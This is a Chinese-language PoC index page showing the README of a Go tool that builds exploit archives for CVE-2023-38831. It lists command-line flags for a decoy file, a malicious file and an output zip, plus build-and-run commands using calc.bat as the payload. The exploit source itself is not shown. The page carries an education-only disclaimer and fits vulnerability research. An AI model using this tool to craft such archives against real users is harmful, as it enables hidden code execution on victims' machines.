关联漏洞
介绍
# CVE-2023-38831-EXP
```
_______ ________ ___ ____ ___ _____ _____ ____ ____ ________
/ ____/ | / / ____/ |__ \ / __ \__ \|__ / |__ /( __ )( __ )__ < /
/ / | | / / __/________/ // / / /_/ / /_ <______ /_ </ __ / __ |/_ </ /
/ /___ | |/ / /__/_____/ __// /_/ / __/___/ /_____/__/ / /_/ / /_/ /__/ / /
\____/ |___/_____/ /____/\____/____/____/ /____/\____/\____/____/_/
---------help
-w "白文件名"
-b "恶意文件名"
-o "生成的压缩包名"
```
use:
```
go build // 编译
.\CVE-2023-38831-EXP.exe -w 1.jpg -b calc.bat -o lld.zip // 将白文件&黑文件拷贝到当前路径下运行
```
**仅用于信息安全学习目的,请勿用于真实环境,请遵守网络安全法**
文件快照
[4.0K] /data/pocs/b0332e1e04937762da5ceac719640bdc47981ed2
├── [4.5K] CVE-2023-38831-EXP.go
├── [ 187] go.mod
├── [ 896] go.sum
└── [ 992] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。